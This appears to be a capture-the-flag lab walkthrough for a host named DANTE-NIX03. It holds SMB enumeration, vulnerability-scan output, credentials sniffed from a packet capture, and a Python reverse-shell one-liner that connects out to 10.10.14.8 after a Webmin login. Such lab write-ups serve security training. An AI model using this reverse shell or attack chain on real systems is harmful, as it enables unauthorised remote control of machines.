SMB 172.16.1.17 445 DANTE-NIX03 ----- ----------- ------
SMB 172.16.1.17 445 DANTE-NIX03 forensics READ,WRITE
SMB 172.16.1.17 445 DANTE-NIX03 IPC$
SMB 172.16.1.17 445 DANTE-NIX03 [*] Windows 6.1 Build 0 (name:DANTE-NIX03) (domain:) (signing:False) (SMBv1:False)
Rustscan
rustscan -a 172.16.1.17 --ulimit 5000 -- -Pn -sV --script \"'vuln'\"
80/tcp open http syn-ack Apache httpd 2.4.41
|_http-litespeed-sourcecode-download: Request with null byte did not work. This web server might not be vulnerable
| http-enum:
|_ /: Root directory w/ listing on 'apache/2.4.41 (ubuntu)'
139/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
| vulners:
| cpe:/a:samba:samba:4.6.2:
| SSV:93139 10.0 https://vulners.com/seebug/SSV:93139 *EXPLOIT*
| SAMBA_IS_KNOWN_PIPENAME 10.0 https://vulners.com/canvas/SAMBA_IS_KNOWN_PIPENAME *EXPLOIT*
445/tcp open netbios-ssn syn-ack Samba smbd 4.6.2
| vulners:
| cpe:/a:samba:samba:4.6.2:
| SSV:93139 10.0 https://vulners.com/seebug/SSV:93139 *EXPLOIT*
| SAMBA_IS_KNOWN_PIPENAME 10.0 https://vulners.com/canvas/SAMBA_IS_KNOWN_PIPENAME *EXPLOIT*
| SAINT:C50A339EFD5B2F96051BC00F96014CAA 10.0 https://vulners.com/saint/SAINT:C50A339EFD5B2F96051BC00F96014CAA *EXPLOIT*
10000/tcp open http syn-ack MiniServ 1.900 (Webmin httpd)
| http-phpmyadmin-dir-traversal:
| VULNERABLE:
| phpMyAdmin grab_globals.lib.php subform Parameter Traversal Local File Inclusion
| State: UNKNOWN (unable to test)
| IDs: CVE:CVE-2005-3299
| PHP file inclusion vulnerability in grab_globals.lib.php in phpMyAdmin 2.6.4 and 2.6.4-pl1 allows remote attackers to include local files via the $__redirect parameter, possibly involving the subform array.
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
33060/tcp open mysqlx? syn-ack
| fingerprint-strings:
| DNSStatusRequestTCP, LDAPSearchReq, NotesRPC, SSLSessionReq, TLSSessionReq, X11Probe, afp:
| Invalid message"
|_ HY000
SMB
✗ impacket-smbclient 172.16.1.17
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Type help for list of commands
# use forensics
# ls
drw-rw-rw- 0 Thu Jun 25 23:01:36 2020 .
drw-rw-rw- 0 Wed Jun 10 13:29:28 2020 ..
-rw-rw-rw- 153489 Thu Jun 25 23:01:07 2020 monitor
# download monitor
*** Unknown syntax: download monitor
# mget monitor
[*] Downloading monitor
# exit
Looking into Wireshark
User: admin Password: password6543
MiniServ Webmin exploit
- login
- click on the terminal icon
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.8",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
- Get the root shell
Flag
cat flag.txt
DANTE{SH4RKS_4R3_3V3RYWHERE}